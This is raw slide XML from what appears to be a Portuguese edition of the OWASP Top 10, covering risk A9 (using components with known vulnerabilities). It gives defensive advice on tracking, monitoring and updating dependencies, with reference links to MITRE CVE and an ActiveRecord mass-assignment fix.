            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>MITRE Common Vulnerabilities and Exposures</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>Example Mass Assignment Vulnerability that was fixed in ActiveRecord, a Ruby on Rails GEM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="3491880"/>
            <a:ext cx="3383280" cy="283272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pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>faço para evitar?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="500" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="850" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Uma opção é não usar componentes que você não escreve. Mas isso não é muito realista.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="850" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="850" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Muitos projetos de componentes não criam correções de vulnerabilidades para versões antigas. Em vez disso, é mais simples corrigir o problema na próxima versão. Então atualizar para essas novas versões é crítico. Projetos de software devem ter processos para:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="850" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="850" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Identificar todos os componentes e as versões que você está utili-zando, incluindo todas as dependências. (ex., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="850" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>versões</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="850" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dos plugins).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="850" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="850" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Monitorar a segurança desses componentes em banco de dados públicos, listas de e-mail de projetos e segurança, e mantê-los atualizados. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="850" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="850" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Estabelecer políticas de segurança que definam o uso do componente, assim como exigir certas práticas de desenvolvimento de software, passando em testes de segurança, e licenças aceitáveis. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="850" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="850" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quando apropriado, considere a adição de invólucros de segu-rança em torno dos componentes para desabilitar funcionalidades não utilizadas e/ou proteger falhas ou aspectos vulneráveis do componente.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="850" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Utilização de Componentes Vulneráveis Conhecidos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 26"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A9</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="Group 26"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="15159" y="1014413"/>
            <a:ext cx="6669804" cy="525268"/>
            <a:chOff x="14975" y="1014596"/>
            <a:chExt cx="6670153" cy="525104"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="33" name="Group 28"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="14975" y="1014596"/>
              <a:ext cx="6670153" cy="525104"/>
              <a:chOff x="14975" y="997424"/>
              <a:chExt cx="6670153" cy="525104"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36" name="Rectangle 116"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2879691" y="1073600"/>
                <a:ext cx="1020816" cy="380881"/>
              </a:xfrm>
              <a:prstGeom prst="rect">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a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Vulnerabilidades</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t/>
                </a:r>
                <a:br>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>        de Segurança</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="37" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="476250" y="997424"/>
                <a:ext cx="139700" cy="304800"/>
                <a:chOff x="96" y="1344"/>
                <a:chExt cx="288" cy="624"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="46" name="Oval 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="145" y="1344"/>
                  <a:ext cx="190" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050" algn="ctr">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="47" name="Line 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1536"/>
                  <a:ext cx="0" cy="240"/>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48" name="Line 66"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="96" y="1776"/>
                  <a:ext cx="144" cy="192"/>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49" name="Line 67"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1776"/>
                  <a:ext cx="144" cy="192"/>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65" name="Line 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="96" y="1633"/>
                  <a:ext cx="288" cy="0"/>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grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="38" name="AutoShape 163"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1309572" y="1078361"/>
                <a:ext cx="838244" cy="357076"/>
              </a:xfrm>
              <a:prstGeom prst="rightArrowCallout">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 20889"/>
                  <a:gd name="adj2" fmla="val 24667"/>
                  <a:gd name="adj3" fmla="val 34667"/>
                  <a:gd name="adj4" fmla="val 8013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Vetores </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> de Ataque</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4800666" y="1049795"/>
                <a:ext cx="685836" cy="428491"/>
              </a:xfrm>
              <a:prstGeom prst="can">
                <a:avLst>
                  <a:gd name="adj" fmla="val 250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Impactos</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>  Técnicos</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="40" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="761855" y="1262453"/>
                <a:ext cx="535016" cy="1588"/>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41" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="2189093" y="1262453"/>
                <a:ext cx="630270" cy="1588"/>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42" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="36" idx="3"/>
                <a:endCxn id="39" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="3900507" y="1264041"/>
                <a:ext cx="900159"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sp>
            <p:nvSpPr>
              <p:cNvPr id="43" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="14975" y="1322855"/>
                <a:ext cx="1132100" cy="199673"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Agentes </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>de </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Ameaça</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="44" name="AutoShape 142"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5923088" y="1073600"/>
                <a:ext cx="762040" cy="380881"/>
              </a:xfrm>
              <a:prstGeom prst="foldedCorner">
                <a:avLst>
                  <a:gd name="adj" fmla="val 125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lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Impactos</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>no Negócio</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="45" name="AutoShape 149"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="39" idx="4"/>
                <a:endCxn id="44" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5486502" y="1264041"/>
                <a:ext cx="436586"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
          <p:nvSpPr>
            <p:cNvPr id="34" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2879691" y="1090772"/>
              <a:ext cx="220675" cy="380881"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrowCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 47538"/>
                <a:gd name="adj2" fmla="val 51293"/>
                <a:gd name="adj3" fmla="val 57006"/>
                <a:gd name="adj4" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>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endParaRPr lang="pt-BR" sz="900" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Rectangle 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2862228" y="1235189"/>
              <a:ext cx="109543" cy="9522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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41567719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5" name="Table 104"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2611870222"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="948521"/>
          <a:ext cx="6858000" cy="2891959"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="990600"/>
                <a:gridCol w="1295400"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1066800"/>
                <a:gridCol w="1219200"/>
                <a:gridCol w="1143000"/>
              </a:tblGrid>
              <a:tr h="651679">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a:p>
                  </a:txBody>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38244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000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico da </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Aplicaçã</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>o</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="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b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Exploração</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MÉDIA</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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Prevalência</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RARA</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1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Detecção</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>FÁCIL</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1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Im</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>pacto</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
